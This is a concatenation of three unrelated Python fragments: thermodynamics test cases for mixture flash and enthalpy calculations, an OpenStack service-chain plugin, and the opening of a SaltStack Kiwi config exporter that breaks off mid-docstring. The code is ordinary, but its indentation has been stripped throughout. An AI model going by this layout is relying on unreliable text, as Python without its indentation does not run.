w = Chemical('water')
MeOH = Chemical('methanol')
m = Mixture(['water', 'methanol'], zs=[0.3, 0.7], T=298.15)
pkg = IdealCaloric(VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs,
HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases,
EnthalpyVaporizations=m.EnthalpyVaporizations, VolumeLiquids=m.VolumeLiquids)
pkg.set_T_transitions('Tb')
# Full vapor flash, high T
pkg.flash(T=1200, P=1E7, zs=m.zs)
dH = pkg.enthalpy_Cpl_Cpg_Hvap()
liq_w_dH = 0.3*w.HeatCapacityLiquid.T_dependent_property_integral(298.15, w.Tb)
liq_MeOH_dH = 0.7*MeOH.HeatCapacityLiquid.T_dependent_property_integral(298.15, MeOH.Tb)
dH_w_vapor = 0.3*w.HeatCapacityGas.T_dependent_property_integral(w.Tb, 1200)
dH_MeOH_vapor = 0.7*MeOH.HeatCapacityGas.T_dependent_property_integral(MeOH.Tb, 1200)
liq_w_vap = 0.3*w.EnthalpyVaporization(w.Tb)
liq_MeOH_vap = 0.7*MeOH.EnthalpyVaporization(MeOH.Tb)
dH_hand = liq_w_dH + liq_MeOH_dH + liq_w_vap + liq_MeOH_vap + dH_w_vapor + dH_MeOH_vapor
assert_allclose(dH_hand, dH)
# Liquid change only, but to the phase change barrier
pkg.flash(T=298.15+200, VF=0, zs=m.zs)
dH = pkg.enthalpy_Cpl_Cpg_Hvap()
dH_hand = (0.3*w.HeatCapacityLiquid.T_dependent_property_integral(298.15, 298.15+200)
+0.7*MeOH.HeatCapacityLiquid.T_dependent_property_integral(298.15, 298.15+200))
assert_allclose(dH, dH_hand)
# Flash a minute amount - check the calc still works and the value is the same
pkg.flash(T=298.15+200, VF=1E-7, zs=m.zs)
dH = pkg.enthalpy_Cpl_Cpg_Hvap()
assert_allclose(dH, dH_hand, rtol=1E-6)
# Flash to vapor at methanol's boiling point
pkg.flash(T=MeOH.Tb, VF=1, zs=m.zs)
dH = pkg.enthalpy_Cpl_Cpg_Hvap()
dH_hand = (0.7*MeOH.HeatCapacityLiquid.T_dependent_property_integral(298.15, MeOH.Tb)
+0.3*w.HeatCapacityLiquid.T_dependent_property_integral(298.15, w.Tb)
+ 0.3*w.HeatCapacityGas.T_dependent_property_integral(w.Tb, MeOH.Tb)
+ 0.3*w.EnthalpyVaporization(w.Tb)
+ 0.7*MeOH.EnthalpyVaporization(MeOH.Tb))
assert_allclose(dH, dH_hand)
# Flash a minute amount more - check the calc still works and the value is the same
pkg.flash(T=MeOH.Tb, P=pkg.P*.9999999, zs=m.zs)
dH_minute_diff = pkg.enthalpy_Cpl_Cpg_Hvap()
assert_allclose(dH, dH_minute_diff)
# Again
pkg.flash(T=MeOH.Tb, VF=0.99999999, zs=m.zs)
dH_minute_diff = pkg.enthalpy_Cpl_Cpg_Hvap()
assert_allclose(dH, dH_minute_diff)
# Do a test with 65% liquid
T = 320
pkg.flash(T=T, VF=0.35, zs=m.zs)
dH = pkg.enthalpy_Cpl_Cpg_Hvap()
liq_w_dH = pkg.xs[0]*0.65*w.HeatCapacityLiquid.T_dependent_property_integral(298.15, T)
liq_MeOH_dH = pkg.xs[1]*0.65*MeOH.HeatCapacityLiquid.T_dependent_property_integral(298.15, T)
dH_w_vapor = 0.35*pkg.ys[0]*(w.HeatCapacityLiquid.T_dependent_property_integral(298.15, w.Tb)
+ w.HeatCapacityGas.T_dependent_property_integral(w.Tb, T))
dH_MeOH_vapor = 0.35*pkg.ys[1]*(MeOH.HeatCapacityLiquid.T_dependent_property_integral(298.15, MeOH.Tb)
+ MeOH.HeatCapacityGas.T_dependent_property_integral(MeOH.Tb, T))
liq_w_vap = pkg.ys[0]*0.35*w.EnthalpyVaporization(w.Tb)
liq_MeOH_vap = pkg.ys[1]*0.35*MeOH.EnthalpyVaporization(MeOH.Tb)
dH_hand = dH_MeOH_vapor + dH_w_vapor + liq_MeOH_dH + liq_w_dH + liq_MeOH_vap +liq_w_vap
assert_allclose(dH, dH_hand)
@pytest.mark.deprecated
def test_basic_pure_component_flash_consistency():
pts = 11
T = 200
P = 1E6
Mixture(['ethane'], zs=[1], VF=0.1, P=P)
for VF in np.linspace(0, 1, pts):
base = Mixture(['ethane'], zs=[1], VF=VF, P=P)
H_solve = Mixture(['ethane'], zs=[1], Hm=base.Hm, P=P)
S_solve = Mixture(['ethane'], zs=[1], Sm=base.Sm, P=P)
assert_allclose(H_solve.VF, VF, rtol=5e-3)
assert_allclose(S_solve.VF, VF, rtol=5e-3)
# T-VF
base = Mixture(['ethane'], zs=[1], VF=VF, T=T)
S_solve = Mixture(['ethane'], zs=[1], Sm=base.Sm, T=T)
assert_allclose(S_solve.VF, VF, rtol=5e-3)
@pytest.mark.deprecated
def test_IdealCaloric_PH():
m = Mixture(['pentane', 'hexane', 'octane'], zs=[.1, .4, .5], T=298.15)
pkg = IdealCaloric(VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs,
HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases,
EnthalpyVaporizations=m.EnthalpyVaporizations, VolumeLiquids=m.VolumeLiquids)
Ts = np.linspace(300, 600, 10)
Ps = [1E3, 1E4, 1E5, 1E6]
for P in Ps:
for T in Ts:
T = float(T)
pkg.flash(T=T, P=P, zs=m.zs)
pkg._post_flash()
T_calc = pkg.flash_PH_zs_bounded(P=P, Hm=pkg.Hm, zs=m.zs)
assert_allclose(T_calc['T'], T, rtol=1E-3)
@pytest.mark.deprecated
def test_IdealCaloric_PS():
m = Mixture(['pentane', 'hexane', 'octane'], zs=[.1, .4, .5], T=298.15)
pkg = IdealCaloric(VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs,
HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases,
EnthalpyVaporizations=m.EnthalpyVaporizations, VolumeLiquids=m.VolumeLiquids)
Ts = np.linspace(300, 600, 10)
Ps = [1E3, 1E4, 1E5, 1E6]
for P in Ps:
for T in Ts:
T = float(T)
pkg.flash(T=T, P=P, zs=m.zs)
pkg._post_flash()
T_calc = pkg.flash_PS_zs_bounded(P=P, Sm=pkg.Sm, zs=m.zs)
assert_allclose(T_calc['T'], T, rtol=1E-3)
@pytest.mark.deprecated
def test_IdealCaloric_TS():
m = Mixture(['pentane', 'hexane', 'octane'], zs=[.1, .4, .5], T=298.15)
pkg = IdealCaloric(VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs,
HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases,
EnthalpyVaporizations=m.EnthalpyVaporizations, VolumeLiquids=m.VolumeLiquids)
Ts = np.linspace(300, 400, 10)
VFs = [1E-5, .1, .5, .99, 1]
for T in Ts:
for VF in VFs:
T = float(T)
pkg.flash(T=T, VF=VF, zs=m.zs)
pkg._post_flash()
P = pkg.P
P_calc = pkg.flash_TS_zs_bounded(T=T, Sm=pkg.Sm, zs=m.zs)
assert_allclose(P_calc['P'], P, rtol=1E-3)
@pytest.mark.deprecated
def test_GammaPhiBasic():
# For the base mixture which assumes activity coefficients are one,
# Check there is no excess enthalpy or entropy.
m = Mixture(['hexane', '2-Butanone'], zs=[.5, .5], T=273.15 + 60)
a = GammaPhi(VaporPressures=m.VaporPressures, Tms=m.Tms, Tcs=m.Tcs, Pcs=m.Pcs)
ge = a.GE_l( 400., [.5, .5])
assert_allclose(ge, 0)
he = a.HE_l( 400., [.5, .5])
assert_allclose(he, 0)
se = a.SE_l( 400., [.5, .5])
assert_allclose(se, 0)
@pytest.mark.deprecated
def test_PartialPropertyIdeal():
m = Mixture(['ethanol', 'water'], zs=[0.5, 0.5], P=5000, T=298.15)
pkg = IdealCaloric(VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs,
HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases,
EnthalpyVaporizations=m.EnthalpyVaporizations, VolumeLiquids=m.VolumeLiquids)
a = pkg.partial_property(T=m.T, P=m.P, i=0, zs=[0, 1], prop='Hm')
assert_allclose(a, -42413.680464960635, rtol=2e-3)
a = pkg.partial_property(T=m.T, P=m.P, i=1, zs=[0, 1], prop='Hm')
assert_allclose(a, -43987.417546304641, rtol=2e-3)
a = pkg.partial_property(T=m.T, P=m.P, i=1, zs=[.5, .5], prop='Hm')
assert_allclose(a, -118882.74138254928, rtol=2e-3)
@pytest.mark.deprecated
def test_GammaPhiCaloricBasic():
m = Mixture(['pentane', 'hexane', 'octane'], zs=[.1, .4, .5], T=298.15)
pkg = GammaPhiCaloric(VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs,
HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases,
EnthalpyVaporizations=m.EnthalpyVaporizations, omegas=m.omegas,
VolumeLiquids=m.VolumeLiquids, eos=PR, eos_mix=PRMIX)
pkg.use_phis, pkg.use_Poynting = True, True
pkg.flash(zs=m.zs, T=400, VF=0.5)
assert_allclose(pkg.P, 233084.1813331093, rtol=2e-3)
# 1 component still needs to be able to flash
m = Mixture(['R-134a'], zs=[1], T=300, P=1E5)
m.set_property_package(GammaPhiCaloric )
# TVF flashes
m.property_package.flash_caloric(T=300, VF=1, zs=[1])
assert_allclose(m.property_package.P, m.Psats[0])
P_300 = m.property_package.P
m.property_package.flash_caloric(T=300, VF=0, zs=[1])
assert_allclose(m.property_package.P, m.Psats[0])
m.property_package.flash_caloric(T=300, VF=0.5, zs=[1])
assert_allclose(m.property_package.P, m.Psats[0])
# PVF flashes
m.property_package.flash_caloric(P=P_300, VF=1, zs=[1])
assert_allclose(m.property_package.T, 300.)
m.property_package.flash_caloric(P=P_300, VF=0, zs=[1])
assert_allclose(m.property_package.T, 300.)
m.property_package.flash_caloric(P=P_300, VF=0.5, zs=[1])
assert_allclose(m.property_package.T, 300.)
@pytest.mark.deprecated
def test_UnifacCaloric():
m = Mixture(['pentane', 'hexane', 'octane'], zs=[.1, .4, .5], T=298.15)
pkg = UnifacCaloric(UNIFAC_groups=m.UNIFAC_groups, VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs,
HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases,
EnthalpyVaporizations=m.EnthalpyVaporizations, omegas=m.omegas,
VolumeLiquids=m.VolumeLiquids, eos=PR, eos_mix=PRMIX)
pkg.use_phis, pkg.use_Poynting = True, True
pkg.flash(zs=m.zs, T=400, P=1E7) # 658E6 659E6
pkg.P
pkg.phase
pkg.GE_l(pkg.T, pkg.xs)
pkg.HE_l(pkg.T, pkg.xs)
pkg.CpE_l(pkg.T, pkg.xs)
pkg.GE_l(pkg.T, pkg.xs)
pkg.SE_l(pkg.T, pkg.xs)
# DDBST test question
m = Mixture(['hexane', '2-Butanone'], zs=[.5, .5], T=273.15 + 60)
pkg = UnifacCaloric(UNIFAC_groups=m.UNIFAC_groups, VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs,
HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases,
EnthalpyVaporizations=m.EnthalpyVaporizations, omegas=m.omegas,
VolumeLiquids=m.VolumeLiquids, eos=PR, eos_mix=PRMIX)
pkg.use_phis, pkg.use_Poynting = False, False
pkg.flash(zs=m.zs, T=273.15 + 60, P=3E5)
GE = pkg.GE_l(pkg.T, pkg.xs)
assert_allclose(GE, 923.6408846044955, rtol=1E-3)
HE = pkg.HE_l(pkg.T, pkg.xs)
assert_allclose(HE, 854.77487867139587, rtol=1E-3)
# Numeric CpE_l test
deltaH = pkg.HE_l(pkg.T+0.01, pkg.xs) - pkg.HE_l(pkg.T, pkg.xs)
assert_allclose(deltaH, pkg.CpE_l(pkg.T, pkg.xs)*0.01, rtol=1E-4)
@pytest.mark.deprecated
def test_UnifacDortmundCaloric():
m = Mixture(['hexane', '2-Butanone'], zs=[.5, .5], T=273.15 + 60)
pkg2 = UnifacDortmundCaloric(UNIFAC_groups=m.UNIFAC_Dortmund_groups, VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs,
HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases,
EnthalpyVaporizations=m.EnthalpyVaporizations, omegas=m.omegas,
VolumeLiquids=m.VolumeLiquids, eos=PR, eos_mix=PRMIX)
pkg2.flash(VF=0.5, T=350, zs=m.zs)
@pytest.mark.deprecated
def test_Act_infinite():
m = Mixture(['ethanol', 'water'], zs=[.5, .5], T=273.15 + 60)
pkg2 = UnifacDortmundCaloric(UNIFAC_groups=m.UNIFAC_Dortmund_groups, VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs,
HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases,
EnthalpyVaporizations=m.EnthalpyVaporizations, omegas=m.omegas,
VolumeLiquids=m.VolumeLiquids, eos=PR, eos_mix=PRMIX)
water_in_ethanol = pkg2.gammas_infinite_dilution( 298.15)[1]
assert_allclose(water_in_ethanol, 2.611252717452456) # 3.28 in ddbst free data
ethanol_in_water = pkg2.gammas_infinite_dilution( 283.15)[0]
assert_allclose(ethanol_in_water, 4.401784691406401) # 3.1800 with OTHR method or 4.3800 with another method
@pytest.mark.deprecated
def test_WilsonPP():
m = Mixture(['water', 'ethanol', 'methanol', '1-pentanol', '2-pentanol', '3-pentanol',
'1-decanol'],
P=1e5, zs=[1/7.0]*7, T=273.15+70)
# Main coefficients with temperature inverse dependency
lambdasB = [[0.0, -35.3, 40.0, -139.0, -129.0, -128.0, -242.0],
[-557.0, 0.0, -200.0, 83.2, 84.6, 80.2, 140.0],
[-280.0, 95.5, 0.0, 88.2, 85.3, 89.1, 119.0],
[-1260.0, -128.0, -220.0, 0.0, -94.4, -85.5, 59.7],
[-1280.0, -121.0, -236.0, 80.3, 0.0, -88.8, 61.4],
[-1370.0, -121.0, -238.0, 75.7, 78.2, 0.0, 63.1],
[-2670.0, -304.0, -403.0, -93.4, -91.1, -86.6, 0.0]]
# Add in some random noise for numerical stuff
lambdasA = [[0.0092, 0.00976, 0.00915, 0.00918, 0.00974, 0.00925, 0.00908],
[0.00954, 0.00927, 0.00902, 0.00948, 0.00934, 0.009, 0.00995],
[0.00955, 0.00921, 0.0098, 0.00926, 0.00952, 0.00912, 0.00995],
[0.00924, 0.00938, 0.00941, 0.00992, 0.00935, 0.00996, 0.0092],
[0.00992, 0.00946, 0.00935, 0.00917, 0.00998, 0.00903, 0.00924],
[0.00937, 0.00973, 0.00924, 0.00991, 0.00997, 0.00968, 0.00975],
[0.00983, 0.00934, 0.00921, 0.00977, 0.00944, 0.00902, 0.00916]]
lambdasC = [[0.000956, 0.000958, 0.000993, 0.000949, 0.000913, 0.000947, 0.000949],
[0.000945, 0.000928, 0.000935, 0.000999, 0.000986, 0.000959, 0.000924],
[0.000957, 0.000935, 0.00097, 0.000906, 0.00098, 0.000952, 0.000939],
[0.000956, 0.000948, 0.0009, 0.000903, 0.000967, 0.000972, 0.000969],
[0.000917, 0.000949, 0.000973, 0.000922, 0.000978, 0.000944, 0.000905],
[0.000947, 0.000996, 0.000961, 0.00091, 0.00096, 0.000982, 0.000998],
[0.000934, 0.000929, 0.000955, 0.000975, 0.000924, 0.000979, 0.001]]
lambdasD = [[3.78e-05, 3.86e-05, 3.62e-05, 3.83e-05, 3.95e-05, 3.94e-05, 3.92e-05],
[3.88e-05, 3.88e-05, 3.75e-05, 3.82e-05, 3.8e-05, 3.76e-05, 3.71e-05],
[3.93e-05, 3.67e-05, 4e-05, 4e-05, 3.67e-05, 3.72e-05, 3.82e-05],
[3.95e-05, 3.67e-05, 3.64e-05, 3.62e-05, 3.62e-05, 3.63e-05, 3.97e-05],
[3.83e-05, 3.68e-05, 3.73e-05, 3.78e-05, 3.9e-05, 3.79e-05, 3.94e-05],
[3.67e-05, 3.82e-05, 3.76e-05, 3.61e-05, 3.67e-05, 3.88e-05, 3.64e-05],
[3.7e-05, 3.7e-05, 3.82e-05, 3.91e-05, 3.73e-05, 3.93e-05, 3.89e-05]]
lambdasE = [[493.0, 474.0, 481.0, 468.0, 467.0, 474.0, 460.0],
[478.0, 454.0, 460.0, 488.0, 469.0, 479.0, 483.0],
[469.0, 493.0, 470.0, 476.0, 466.0, 451.0, 478.0],
[481.0, 470.0, 467.0, 455.0, 473.0, 465.0, 465.0],
[470.0, 487.0, 472.0, 460.0, 467.0, 468.0, 500.0],
[480.0, 464.0, 475.0, 469.0, 462.0, 476.0, 469.0],
[492.0, 460.0, 458.0, 494.0, 465.0, 461.0, 496.0]]
lambdasF = [[8.25e-08, 8.27e-08, 8.78e-08, 8.41e-08, 8.4e-08, 8.93e-08, 8.98e-08],
[8.28e-08, 8.35e-08, 8.7e-08, 8.96e-08, 8.15e-08, 8.46e-08, 8.53e-08],
[8.51e-08, 8.65e-08, 8.24e-08, 8.89e-08, 8.86e-08, 8.71e-08, 8.21e-08],
[8.75e-08, 8.89e-08, 8.6e-08, 8.42e-08, 8.83e-08, 8.52e-08, 8.53e-08],
[8.24e-08, 8.27e-08, 8.43e-08, 8.19e-08, 8.74e-08, 8.3e-08, 8.35e-08],
[8.79e-08, 8.84e-08, 8.31e-08, 8.15e-08, 8.68e-08, 8.55e-08, 8.2e-08],
[8.63e-08, 8.76e-08, 8.52e-08, 8.46e-08, 8.67e-08, 8.9e-08, 8.38e-08]]
# lambdasF = [[float('%.3g'%(9e-8*(1-random()/10))) for li in l] for l in lambdas]
lambdas = [[[lambdasA[i][j], lambdasB[i][j], lambdasC[i][j], lambdasD[i][j], lambdasE[i][j], lambdasF[i][j]]
for i in range(7)] for j in range(7)]
pp = WilsonPP(lambda_coeffs=lambdas, VaporPressures=m.VaporPressures, Tms=m.Tms,
Tcs=m.Tcs, Pcs=m.Pcs, omegas=m.omegas, VolumeLiquids=m.VolumeLiquids,
HeatCapacityGases=m.HeatCapacityGases, HeatCapacityLiquids=m.HeatCapacityLiquids,
EnthalpyVaporizations=m.EnthalpyVaporizations,
)
pp.use_Poynting = False
pp.use_phis = False
# %timeit pp.flash(T=m.T, VF=0.5, zs=m.zs)
# %timeit pp.flash(T=m.T, P=1e5, zs=m.zs)
gammas_expect = [2.784908901542442, 1.0130668698335248, 0.9568045340893059, 1.136705813243453, 1.1367663802068781, 1.1379884837750023, 1.2584293455795716]
gammas_calc = pp.gammas(m.T, m.zs)
assert_allclose(gammas_expect, gammas_calc)
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron.common import log
from neutron.openstack.common import excutils
from neutron.openstack.common import log as logging
import gbpservice.neutron.db.servicechain_db as servicechain_db
from gbpservice.neutron.services.servicechain.plugins.msc import (
context as servicechain_context)
from gbpservice.neutron.services.servicechain.plugins.msc import (
driver_manager as manager)
from gbpservice.neutron.services.servicechain.plugins import sharing
LOG = logging.getLogger(__name__)
class ServiceChainPlugin(servicechain_db.ServiceChainDbPlugin,
sharing.SharingMixin):
"""Implementation of the Service Chain Plugin.
"""
supported_extension_aliases = ["servicechain"]
def __init__(self):
self.driver_manager = manager.DriverManager()
super(ServiceChainPlugin, self).__init__()
self.driver_manager.initialize()
@log.log
def create_servicechain_node(self, context, servicechain_node):
session = context.session
with session.begin(subtransactions=True):
result = super(ServiceChainPlugin, self).create_servicechain_node(
context, servicechain_node)
self._validate_shared_create(context, result, 'servicechain_node')
sc_context = servicechain_context.ServiceChainNodeContext(
self, context, result)
self.driver_manager.create_servicechain_node_precommit(
sc_context)
try:
self.driver_manager.create_servicechain_node_postcommit(
sc_context)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_("driver_manager.create_servicechain_postcommit "
"failed, deleting servicechain_node %s"),
result['id'])
self.delete_servicechain_node(context, result['id'])
return result
@log.log
def update_servicechain_node(self, context, servicechain_node_id,
servicechain_node):
session = context.session
with session.begin(subtransactions=True):
original_sc_node = self.get_servicechain_node(
context, servicechain_node_id)
updated_sc_node = super(ServiceChainPlugin,
self).update_servicechain_node(
context, servicechain_node_id,
servicechain_node,
set_params=True)
self._validate_shared_update(context, original_sc_node,
updated_sc_node, 'servicechain_node')
sc_context = servicechain_context.ServiceChainNodeContext(
self, context, updated_sc_node,
original_sc_node=original_sc_node)
self.driver_manager.update_servicechain_node_precommit(
sc_context)
self.driver_manager.update_servicechain_node_postcommit(sc_context)
return updated_sc_node
@log.log
def delete_servicechain_node(self, context, servicechain_node_id):
session = context.session
with session.begin(subtransactions=True):
sc_node = self.get_servicechain_node(context,
servicechain_node_id)
sc_context = servicechain_context.ServiceChainNodeContext(
self, context, sc_node)
self.driver_manager.delete_servicechain_node_precommit(
sc_context)
super(ServiceChainPlugin, self).delete_servicechain_node(
context, servicechain_node_id)
try:
self.driver_manager.delete_servicechain_node_postcommit(
sc_context)
except Exception:
LOG.exception(_("delete_servicechain_node_postcommit failed "
"for servicechain_node %s"),
servicechain_node_id)
@log.log
def create_servicechain_spec(self, context, servicechain_spec):
session = context.session
with session.begin(subtransactions=True):
result = super(ServiceChainPlugin, self).create_servicechain_spec(
context, servicechain_spec)
self._validate_shared_create(context, result, 'servicechain_spec')
sc_context = servicechain_context.ServiceChainSpecContext(
self, context, result)
self.driver_manager.create_servicechain_spec_precommit(
sc_context)
try:
self.driver_manager.create_servicechain_spec_postcommit(sc_context)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_("driver_manager.create_servicechain_postcommit "
"failed, deleting servicechain_spec %s"),
result['id'])
self.delete_servicechain_spec(context, result['id'])
return result
@log.log
def update_servicechain_spec(self, context, servicechain_spec_id,
servicechain_spec):
session = context.session
with session.begin(subtransactions=True):
original_sc_spec = self.get_servicechain_spec(
context, servicechain_spec_id)
updated_sc_spec = super(ServiceChainPlugin,
self).update_servicechain_spec(
context, servicechain_spec_id,
servicechain_spec)
self._validate_shared_update(context, original_sc_spec,
updated_sc_spec, 'servicechain_spec')
sc_context = servicechain_context.ServiceChainSpecContext(
self, context, updated_sc_spec,
original_sc_spec=original_sc_spec)
self.driver_manager.update_servicechain_spec_precommit(
sc_context)
self.driver_manager.update_servicechain_spec_postcommit(sc_context)
return updated_sc_spec
@log.log
def delete_servicechain_spec(self, context, servicechain_spec_id):
session = context.session
with session.begin(subtransactions=True):
sc_spec = self.get_servicechain_spec(context,
servicechain_spec_id)
sc_context = servicechain_context.ServiceChainSpecContext(
self, context, sc_spec)
self.driver_manager.delete_servicechain_spec_precommit(
sc_context)
super(ServiceChainPlugin, self).delete_servicechain_spec(
context, servicechain_spec_id)
try:
self.driver_manager.delete_servicechain_spec_postcommit(sc_context)
except Exception:
LOG.exception(_("delete_servicechain_spec_postcommit failed "
"for servicechain_spec %s"),
servicechain_spec_id)
@log.log
def create_servicechain_instance(self, context, servicechain_instance):
session = context.session
with session.begin(subtransactions=True):
result = super(ServiceChainPlugin,
self).create_servicechain_instance(
context, servicechain_instance)
sc_context = servicechain_context.ServiceChainInstanceContext(
self, context, result)
self.driver_manager.create_servicechain_instance_precommit(
sc_context)
try:
self.driver_manager.create_servicechain_instance_postcommit(
sc_context)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_(
"driver_manager.create_servicechain_instance_postcommit "
"failed, deleting servicechain_instance %s"),
result['id'])
self.delete_servicechain_instance(context, result['id'])
return result
@log.log
def update_servicechain_instance(self, context,
servicechain_instance_id,
servicechain_instance):
session = context.session
with session.begin(subtransactions=True):
original_sc_instance = self.get_servicechain_instance(
context, servicechain_instance_id)
updated_sc_instance = super(ServiceChainPlugin,
self).update_servicechain_instance(
context, servicechain_instance_id,
servicechain_instance)
sc_context = servicechain_context.ServiceChainInstanceContext(
self, context, updated_sc_instance,
original_sc_instance=original_sc_instance)
self.driver_manager.update_servicechain_instance_precommit(
sc_context)
self.driver_manager.update_servicechain_instance_postcommit(
sc_context)
return updated_sc_instance
@log.log
def delete_servicechain_instance(self, context, servicechain_instance_id):
session = context.session
with session.begin(subtransactions=True):
sc_instance = self.get_servicechain_instance(
context,
servicechain_instance_id)
sc_context = servicechain_context.ServiceChainInstanceContext(
self, context, sc_instance)
self.driver_manager.delete_servicechain_instance_precommit(
sc_context)
super(ServiceChainPlugin, self).delete_servicechain_instance(
context, servicechain_instance_id)
try:
self.driver_manager.delete_servicechain_instance_postcommit(
sc_context)
except Exception:
LOG.exception(_("delete_servicechain_instance_postcommit failed "
"for servicechain_instance %s"),
servicechain_instance_id)
@log.log
def create_service_profile(self, context, service_profile):
session = context.session
with session.begin(subtransactions=True):
result = super(ServiceChainPlugin,
self).create_service_profile(
context, service_profile)
self._validate_shared_create(context, result, 'service_profile')
sc_context = servicechain_context.ServiceProfileContext(
self, context, result)
self.driver_manager.create_service_profile_precommit(
sc_context)
try:
self.driver_manager.create_service_profile_postcommit(
sc_context)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_(
"driver_manager.create_service_profile_postcommit "
"failed, deleting service_profile %s"),
result['id'])
self.delete_service_profile(context, result['id'])
return result
@log.log
def update_service_profile(self, context, service_profile_id,
service_profile):
session = context.session
with session.begin(subtransactions=True):
original_profile = self.get_service_profile(
context, service_profile_id)
updated_profile = super(ServiceChainPlugin,
self).update_service_profile(
context, service_profile_id, service_profile)
self._validate_shared_update(context, original_profile,
updated_profile, 'service_profile')
sc_context = servicechain_context.ServiceProfileContext(
self, context, updated_profile,
original_profile=original_profile)
self.driver_manager.update_service_profile_precommit(
sc_context)
self.driver_manager.update_service_profile_postcommit(
sc_context)
return updated_profile
@log.log
def delete_service_profile(self, context, service_profile_id):
session = context.session
with session.begin(subtransactions=True):
profile = self.get_service_profile(
context, service_profile_id)
sc_context = servicechain_context.ServiceProfileContext(
self, context, profile)
self.driver_manager.delete_service_profile_precommit(
sc_context)
super(ServiceChainPlugin, self).delete_service_profile(
context, service_profile_id)
try:
self.driver_manager.delete_service_profile_postcommit(
sc_context)
except Exception:
LOG.exception(_("delete_service_profile_postcommit failed "
"for service_profile %s"),
service_profile_id)
| |
# -*- coding: utf-8 -*-
#
# Copyright 2016 SUSE LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Import python libs
from __future__ import absolute_import
import os
import grp
import pwd
from xml.dom import minidom
import platform
import socket
# Import salt libs
from salt.modules.inspectlib.exceptions import InspectorKiwiProcessorException
# Import third party libs
try:
from lxml import etree
except ImportError:
from salt._compat import ElementTree as etree
class KiwiExporter(object):
'''
Exports system description as Kiwi configuration.
'''
def __init__(self, grains, format):
self.__grains__ = grains
self.format = format
self._data = type('data', (), {})
self.name = None
def load(self, **descr):
'''
Load data by keys.
:param data:
:return:
'''
for obj, data in descr.items():
setattr(self._data, obj, data)
return self
def export(self, name):
'''
Export to the Kiwi config.xml as text.
:return:
'''
self.name = name
root = self._create_doc()
self._set_description(root)
self._set_preferences(root)
self._set_repositories(root)
self._set_users(root)
self._set_packages(root)
return '\n'.join([line for line in minidom.parseString(
etree.tostring(root, encoding='UTF-8', pretty_print=True)).toprettyxml(indent=" ").split("\n")
if line.strip()])
def _get_package_manager(self):
'''
Get package manager.
:return:
'''
ret = None
if self.__grains__.get('os_family') in ('Kali', 'Debian'):
ret = 'apt-get'
elif self.__grains__.get('os_family', '') == 'Suse':
ret = 'zypper'
elif self.__grains__.get('os_family', '') == 'redhat':
ret = 'yum'
if ret is None:
raise InspectorKiwiProcessorException('Unsupported platform: {0}'.format(self.__grains__.get('os_family')))
return ret
def _set_preferences(self, node):
'''
Set preferences.
:return:
'''
pref = etree.SubElement(node, 'preferences')
pacman = etree.SubElement(pref, 'packagemanager')
pacman.text = self._get_package_manager()
p_version = etree.SubElement(pref, 'version')
p_version.text = '0.0.1'
p_type = etree.SubElement(pref, 'type')
p_type.set('image', 'vmx')
for disk_id, disk_data in self._data.system.get('disks', {}).items():
if disk_id.startswith('/dev'):
p_type.set('filesystem', disk_data.get('type') or 'ext3')
break
p_type.set('installiso', 'true')
p_type.set('boot', "vmxboot/suse-leap42.1")
p_type.set('format', self.format)
p_type.set('bootloader', 'grub2')
p_type.set('timezone', __salt__['timezone.get_zone']())
p_type.set('hwclock', __salt__['timezone.get_hwclock']())
return pref
def _get_user_groups(self, user):
'''
Get user groups.
:param user:
:return:
'''
return [g.gr_name for g in grp.getgrall()
if user in g.gr_mem] + [grp.getgrgid(pwd.getpwnam(user).pw_gid).gr_name]
def _set_users(self, node):
'''
Create existing local users.
<users group="root">
